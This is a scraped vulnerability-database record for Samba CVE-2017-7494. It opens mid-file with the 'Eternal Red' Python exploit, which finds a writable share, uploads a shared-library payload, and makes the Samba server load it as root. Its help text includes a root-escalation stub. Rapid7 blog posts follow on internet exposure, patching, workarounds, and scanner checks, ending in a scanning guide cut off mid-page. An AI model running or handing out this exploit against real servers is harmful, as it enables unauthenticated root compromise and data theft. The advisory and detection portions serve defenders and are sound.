12\r\n results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n\r\n closeFid(tid, fid)\r\n callback(results)\r\n\r\n def sendReadRequest(tid, fid, data_bytes):\r\n read_count = min(4280, self.max_read_size)\r\n m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,\r\n fid = fid, data_bytes = data_bytes)\r\n\r\n def readCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n data_len = read_message.payload.data_length\r\n data_bytes = read_message.payload.data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def closeFid(tid, fid, results = None, error = None):\r\n m = SMB2Message(SMB2CloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)\r\n messages_history.append(m)\r\n\r\n def closeCB(close_message, **kwargs):\r\n if kwargs['results'] is not None:\r\n callback(kwargs['results'])\r\n elif kwargs['error'] is not None:\r\n errback(OperationFailure(kwargs['error'], messages_history))\r\n\r\n if path not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if connect_message.status == 0:\r\n self.connected_trees[path] = connect_message.tid\r\n connectSrvSvc(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))\r\n\r\n m = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path )))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)\r\n messages_history.append(m)\r\n else:\r\n connectSrvSvc(self.connected_trees[path])\r\n\r\n\r\n # Don't convert to Window style path\r\n def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n messages_history = [ ]\r\n\r\n\r\n def sendOpen(tid):\r\n m = SMBMessage(ComOpenAndxRequest(filename = path,\r\n access_mode = 0x0040, # Sharing mode: Deny nothing to others\r\n open_mode = 0x0001, # Failed if file does not exist\r\n search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,\r\n timeout = timeout * 1000))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)\r\n messages_history.append(m)\r\n\r\n def openCB(open_message, **kwargs):\r\n messages_history.append(open_message)\r\n if not open_message.status.hasError:\r\n if max_length == 0:\r\n closeFid(open_message.tid, open_message.payload.fid)\r\n callback(( file_obj, open_message.payload.file_attributes, 0 ))\r\n else:\r\n sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))\r\n\r\n def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):\r\n read_count = self.max_raw_size - 2\r\n m = SMBMessage(ComReadAndxRequest(fid = fid,\r\n offset = offset,\r\n max_return_bytes_count = read_count,\r\n min_return_bytes_count = min(0xFFFF, read_count)))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,\r\n read_len = read_len, remaining_len = remaining_len)\r\n\r\n def readCB(read_message, **kwargs):\r\n # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.\r\n if not read_message.status.hasError:\r\n read_len = kwargs['read_len']\r\n remaining_len = kwargs['remaining_len']\r\n data_len = read_message.payload.data_length\r\n if max_length > 0:\r\n if data_len > remaining_len:\r\n file_obj.write(read_message.payload.data[:remaining_len])\r\n read_len += remaining_len\r\n remaining_len = 0\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n remaining_len -= data_len\r\n read_len += data_len\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n read_len += data_len\r\n\r\n if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):\r\n closeFid(read_message.tid, kwargs['fid'])\r\n callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements\r\n else:\r\n sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)\r\n else:\r\n messages_history.append(read_message)\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))\r\n\r\n def closeFid(tid, fid):\r\n m = SMBMessage(ComCloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n messages_history.append(m)\r\n\r\n if service_name not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if not connect_message.status.hasError:\r\n self.connected_trees[service_name] = connect_message.tid\r\n sendOpen(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))\r\n\r\n m = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)\r\n messages_history.append(m)\r\n else:\r\n sendOpen(self.connected_trees[service_name])\r\n\r\ndef get_connection(user, password, server, port, force_smb1=False):\r\n if force_smb1:\r\n smb_structs.SUPPORT_SMB2 = False\r\n\r\n conn = SMBConnectionEx(user, password, \"\", \"server\")\r\n assert conn.connect(server, port)\r\n return conn\r\n\r\ndef get_share_info(conn):\r\n conn.hook_listShares()\r\n return conn.listShares()\r\n\r\ndef find_writeable_share(conn, shares):\r\n print(\"[+] Searching for writable share\")\r\n filename = \"red\"\r\n test_file = tempfile.TemporaryFile()\r\n for share in shares:\r\n try:\r\n # If it's not writeable this will throw\r\n conn.storeFile(share.name, filename, test_file)\r\n conn.deleteFiles(share.name, filename)\r\n print(\"[+] Found writeable share: \" + share.name)\r\n return share\r\n except:\r\n pass\r\n\r\n return None\r\n\r\ndef write_payload(conn, share, payload, payload_name):\r\n with open(payload, \"rb\") as fin:\r\n conn.storeFile(share.name, payload_name, fin)\r\n\r\n return True\r\n\r\ndef convert_share_path(share):\r\n path = share.path[2:]\r\n path = path.replace(\"\\\\\", \"/\")\r\n return path\r\n\r\ndef load_payload(user, password, server, port, fullpath):\r\n conn = get_connection(user, password, server, port, force_smb1 = True)\r\n conn.hook_retrieveFile()\r\n\r\n print(\"[+] Attempting to load payload\")\r\n temp_file = tempfile.TemporaryFile()\r\n\r\n try:\r\n conn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file)\r\n except:\r\n pass\r\n\r\n return\r\n\r\ndef drop_payload(user, password, server, port, payload):\r\n payload_name = \"charizard\"\r\n\r\n conn = get_connection(user, password, server, port)\r\n shares = get_share_info(conn)\r\n share = find_writeable_share(conn, shares)\r\n\r\n if share is None:\r\n print(\"[!] No writeable shares on \" + server + \" for user: \" + user)\r\n sys.exit(-1)\r\n\r\n if not write_payload(conn, share, payload, payload_name):\r\n print(\"[!] Failed to write payload: \" + str(payload) + \" to server\")\r\n sys.exit(-1)\r\n\r\n conn.close()\r\n\r\n fullpath = convert_share_path(share)\r\n return os.path.join(fullpath, payload_name)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\r\n description= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494\r\n Causes vulnerable Samba server to load a shared library in root context\r\n Credentials are not required if the server has a guest account\r\n For remote exploit you must have write permissions to at least one share\r\n Eternal Red will scan the Samba server for shares it can write to\r\n It will also determine the fullpath of the remote share\r\n\r\n For local exploit provide the full path to your shared library to load\r\n\r\n Your shared library should look something like this\r\n\r\n extern bool change_to_root_user(void);\r\n int samba_init_module(void)\r\n {\r\n change_to_root_user();\r\n /* Do what thou wilt */\r\n }\r\n \"\"\")\r\n parser.add_argument(\"payload\", help=\"path to shared library to load\", type=str)\r\n parser.add_argument(\"server\", help=\"Server to target\", type=str)\r\n parser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int)\r\n parser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", type=str)\r\n parser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str)\r\n parser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool)\r\n args = parser.parse_args()\r\n\r\n if not os.path.isfile(args.payload):\r\n print(\"[!] Unable to open: \" + args.payload)\r\n sys.exit(-1)\r\n\r\n port = 445\r\n user = \"nobody\"\r\n password = \"\"\r\n fullpath = \"\"\r\n\r\n if args.port:\r\n port = args.port\r\n if args.username:\r\n user = args.username\r\n if args.password:\r\n password = args.password\r\n\r\n if args.local:\r\n fullpath = args.payload\r\n else:\r\n fullpath = drop_payload(user, password, args.server, port, args.payload)\r\n\r\n load_payload(user, password, args.server, port, fullpath)\r\n\r\nif __name__ == \"__main__\":\r\n main()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93139", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7community": [{"lastseen": "2017-05-27T03:53:29", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "<!-- [DocumentBodyStart:be7d6c8c-369f-4dc9-8d63-ac0622dfbc33] --><div class=\"jive-rendered-content\"><p><span style=\"color: black;\">With the scent of scorched internet still lingering in the air from the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fcommunity.rapid7.com%2Fcommunity%2Finfosec%2Fblog%2F2017%2F05%2F12%2Fwanna-decryptor-wncry-ransomware-explained\" rel=\"nofollow\" target=\"_blank\">WannaCry Ransomworm</a></span><span style=\"color: black;\">, today we see a new scary-and-potentially-incendiary bug hitting the twitter news. The vulnerability - CVE-2017-7494 - affects versions 3.5 (released March 1, 2010) and onwards of Samba, the defacto standard for providing Windows-based file and print services on Unix and Linux systems. Check out <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.samba.org%2Fsamba%2Fsecurity%2FCVE-2017-7494.html\" rel=\"nofollow\" target=\"_blank\">Samba's advisory</a></span><span style=\"color: black;\"> for more details. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">We strongly recommend that security and IT teams take immediate action to protect themselves.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2></h2><h2>Who is affected?</h2><p>Many home and corporate network storage systems run Samba and it is frequently installed by default on many Linux systems, making it possible that some users are running Samba without realizing it. Given how easy it is to enable Samba on Linux endpoints, even devices requiring it to be manually enabled will not necessarily be in the clear.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">Samba makes it possible for Unix and Linux systems to share files the same way Windows does. While the WannaCry ransomworm impacted Windows systems and was easily identifiable, with clear remediation steps, the Samba vulnerability will impact Linux and Unix systems and could present significant technical obstacles to obtaining or deploying appropriate remediations. These obstacles will most likely present themselves in situations where devices are unmanaged by typical patch deployment solutions or don&#8217;t allow OS-level patching by the user. As a result, we believe those systems may be likely conduits into business networks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2></h2><h2>How bad is it?</h2><p>The internet is not on fire yet, but there&#8217;s a lot of potential for it to get pretty nasty. If there is a vulnerable version of Samba running on a device, and a malicious actor has access to upload files to that machine, exploitation is trivial.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">In a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fsonar.labs.rapid7.com%2F\" rel=\"nofollow\" target=\"_blank\">Project Sonar</a></span><span style=\"color: black;\"> scan run today, Rapid7 Labs discovered <strong>more than 104,000 internet-exposed endpoints that appear to be running vulnerable versions of Samba on port 445.</strong> Of those, almost 90% (92,570) are running versions for which there is currently no direct patch available. In other </span><span style=\"color: black;\">words, &ldquo;We're way beyond the boundary of the Pride Lands.&#8221; (sorry - we promise that&#8217;s the last Lion King reference. Maybe.) </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7892-67041/Samba+445+major_minor_vulnerable_version_counts_updated.png\"><img alt=\"Samba 445 major_minor_vulnerable_version_counts_updated.png\" class=\"image-1 jive-image\" height=\"524\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7892-67041/1600-524/Samba+445+major_minor_vulnerable_version_counts_updated.png\" style=\"width: 620px; height: 204px;\" width=\"1600\"/></a></p><p><span style=\"color: black;\">We&#8217;ve been seeing a significant increase in malicious traffic to port 445 since May 19th; however, the recency of the WannaCry vulnerability makes it difficult for us to attribute this directly to the Samba vulnerability. It should be noted that proof-of-concept exploit code has already appeared on Twitter, and we are seeing Metasploit modules making their way into the community.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">We will continue to scan for potentially vulnerable endpoints and will provide an update on numbers in the next few days.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><strong><span style=\"text-decoration: underline;\">RESEARCH UPDATE &#8211; 5/25/17</span> &#8211; </strong>We have now run a scan on port 139, which also exposes Samba endpoints. We found very similar numbers to those for the scan of port 445. <strong>On port 139, we found approximately 110,000 internet-exposed endpoints running vulnerable versions of Samba.</strong> Of these, about 91% (99,645) are running older, unsupported versions of Samba (pre-4.4).</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7892-67042/Samba+139+major_minor_vulnerable_version_counts_updated.png\"><img alt=\"Samba 139 major_minor_vulnerable_version_counts_updated.png\" class=\"image-2 jive-image\" height=\"524\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7892-67042/1600-524/Samba+139+major_minor_vulnerable_version_counts_updated.png\" style=\"width: 620px; height: 204px;\" width=\"1600\"/></a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>What should you do to protect yourself?</h2><p>The makers of Samba have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.samba.org%2Fsamba%2Fhistory%2Fsecurity.html\" rel=\"nofollow\" target=\"_blank\">provided a patch for versions 4.4 onwards</a><span style=\"color: black;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">A workaround for unsupported and vulnerable older versions (3.5.x to 4.4.x) is available, and that same workaround can also be used for supported versions that cannot upgrade. We also recommend that users of older, affected versions upgrade to a more recent, supported version of Samba (4.4 or later) and then apply the available patch. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">Organizations should be reviewing their official asset and configuration management systems to immediately identify vulnerable systems and then perform comprehensive and regular full network vulnerability scans to identify misconfigured or rogue systems. Additionally, organizations should review their firewall rules to ensure that SMB/Samba network traffic is not allowed directly from the internet to their assets.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">Many network-attached storage (NAS) environments are used as network backup systems. A direct attack or worm would render those backups almost useless, so if patching cannot be done immediately, we recommend creating an offline copy of critical data as soon as possible.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">In addition, organizations should be monitoring all internal and external network traffic for increases in connections or connection attempts to Windows file sharing protocols.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>How can Rapid7 help?</h2><p>We are working on checks for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">Rapid7 InsightVM</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\">Rapid7 Nexpose </a><span style=\"color: black;\">so customers can scan their environments for vulnerable endpoints and take mitigating action as quickly as possible.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">We also expect a module in the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2F\" target=\"_blank\">Metasploit Framework</a></span><span style=\"color: black;\"> very soon, enabling security professionals to test the effectiveness of their mitigations, and understand the potential impact of exploitation.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black;\">We will notify users of the availability of these solutions as soon as they are available.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><strong><span style=\"text-decoration: underline;\">PRODUCT UPDATE &#8211; 5/25/17</span> &#8211;</strong> We have authenticated checks available for Samba CVE-2017-7494 in Rapid7 InsightVM and Rapid7 Nexpose.&#160; The authenticated checks relate to vendor-specific fixes as follows:</p><ul style=\"list-style-type: disc;\"><li>ubuntu-cve-2017-7494</li><li>debian-cve-2017-7494</li><li>freebsd-cve-2017-7494</li><li>oracle_linux-cve-2017-7494</li><li>redhat_linux-cve-2017-7494</li><li>suse-cve-2017-7494</li></ul><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"text-decoration: underline;\"><strong>PRODUCT UPDATE 2 &#8211; 5/25/17</strong> </span>&#8211; We now have both authenticated and unauthenticated remote checks in Rapid7 InsightVM and Rapid7 Nexpose. In the unauthenticated cases we use anonymous or guest login to gather the required information, and on systems that are hardened against that kind of login, the authenticated remote check is available.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Not a Rapid7 customer? <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">Scan your network with InsightVM</a> to understand the impact this vulnerability has on your organization. We also have a <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7895\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/25/scanning-and-remediating-samba-cve-2017-7494-in-insightvm-and-nexpose\">step-by-step guide on how to scan</a> for Samba CVE-2017-7494 using our vulnerability scanners.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"text-decoration: underline;\"><strong>PRODUCT UPDATE 3 - 5/25/17</strong> </span>- We now have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fsamba%2Fis_known_pipename\" target=\"_blank\">a Metasploit module available</a> for this vulnerability, so you can see whether you can be exploited via Samba CVE-2017-7494, and understand the impact of such an attack. <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload%2F\" target=\"_blank\">Download Metasploit to try it out.</a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><em>P.S. yes, we know the lion is called Simba. But who doesn't love a gratuitous and tenuous cartoon lion reference?! Rowr. </em></p></div><!-- [DocumentBodyEnd:be7d6c8c-369f-4dc9-8d63-ac0622dfbc33] -->", "modified": "2017-05-27T02:51:04", "published": "2017-05-27T02:51:04", "href": "https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life", "id": "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "title": "Patching CVE-2017-7494 in Samba: It\u2019s the Circle of Life", "type": "rapid7community", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-10T11:14:55", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "<!-- [DocumentBodyStart:6c3fb3b9-ef2f-4db7-89c0-fcd508c9910a] --><div class=\"jive-rendered-content\"><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">Just when you&#8217;d finished wiping away your <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> tears, the interwebs dropped another bombshell: a nasty Samba vulnerability, CVE-2017-7494 (no snazzy name as of the publishing of this blog, but hopefully something with a Lion King reference will be created soon).</span></p><p style=\"min-height: 8pt; padding: 0px; background: white;\">&#160;</p><p style=\"background: white;\"><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">As with WannaCry, we wanted to keep this simple. First, check out Jen Ellis's <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7892\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life\">overview of the Samba vulnerability</a>, and then review the below steps to quickly scan for this vulnerability on your own infrastructure</span><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\"> and create a dynamic asset group for tagging and reporting. If<span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\"> you aren&#8217;t already a customer, you can </span><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">use this free trial</a> to scan for the Samba vulnerability across your environment.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">Authenticated checks are live in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose\" target=\"_blank\">Nexpose</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm\" target=\"_blank\">InsightVM</a>, as well as unauthenticated and authenticated remote checks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"background: white;\"><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for CVE-2017-7494:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>1. Under administration, go to manage templates.</p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\">&#160;</p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.5pt; font-family: 'Arial',sans-serif; color: #231f20;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67044/pastedImage_6.png\"><img class=\"image-1 jive-image\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67044/758-161/pastedImage_6.png\" style=\" width: 866.107px;\" width=\"758\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"margin-bottom: .0001pt; background: white;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67046/pastedImage_8.png\"><img class=\"image-2 jive-image\" height=\"181\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67046/1600-181/pastedImage_8.png\" style=\"max-width:1600px; max-\" width=\"1600\"/></a></p><p style=\"margin-bottom: .0001pt; background: white;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67047/pastedImage_9.png\"><img class=\"image-3 jive-image\" height=\"379\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67047/758-379/pastedImage_9.png\" style=\" width:758px;\" width=\"758\"/></a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">3. </span><span style=\"font-size: 11pt; font-family: Arial, sans-serif; color: black; background-position: initial;\">Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial, sans-serif; color: black; background-position: initial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67048/pastedImage_10.png\"><img class=\"jive-image image-4\" height=\"294\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67048/758-294/pastedImage_10.png\" style=\" width: 825.809px;\" width=\"758\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-family: 'Arial',sans-serif; color: black;\">4. </span><span style=\"font-family: 'Arial',sans-serif; color: black; background: white;\">Add Check &ldquo;</span><span style=\"font-family: 'Arial',sans-serif;\">CVE-2017-7494&#8221;<span style=\"color: black; background: white;\"> and click save.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-family: 'Arial',sans-serif; color: black; background: white;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67049/pastedImage_11.png\"><img class=\"image-5 jive-image\" height=\"330\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67049/758-330/pastedImage_11.png\" style=\" width: 980.519px;\" width=\"758\"/></a></span></p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">This should come back with 41 checks that are related to CVE-2017-7494.</span></p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\">&#160;</p><p style=\"background: white;\"><span style=\"color: black; font-size: 11.0pt; font-family: 'Arial',sans-serif;\">5. <strong>Save the template</strong> and run a scan to identify all assets with CVE-2017-7494.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 style=\"text-align: justify; background: white;\"><span style=\"font-family: 'Arial',sans-serif; color: #e95f26;\">Creating a Dynamic Asset Group for </span><span style=\"font-family: 'Arial',sans-serif; color: #ed7d31;\">CVE-2017-7494</span></h2><p style=\"background: white;\"><span style=\"color: #231f20; font-weight: inherit; font-family: 'Arial',sans-serif; font-style: inherit;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group off of which to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <span style=\"color: #303030;\">InsightVM </span>console, just under the search button.</span></p><p style=\"min-height: 8pt; padding: 0px; background: white;\">&#160;</p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67050/pastedImage_12.png\"><img class=\"image-6 jive-image\" height=\"116\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67050/pastedImage_12.png\" style=\"max-width:413px; max-\" width=\"413\"/></a></p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\">&#160;</p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-family: 'Arial',sans-serif; color: black;\">Now, use the \"CVE ID\" filter to specify the CVE:</span></p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\">&#160;</p><p style=\"margin-bottom: .0001pt; background: white;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67051/pastedImage_13.png\"><img class=\"image-7 jive-image\" height=\"182\" 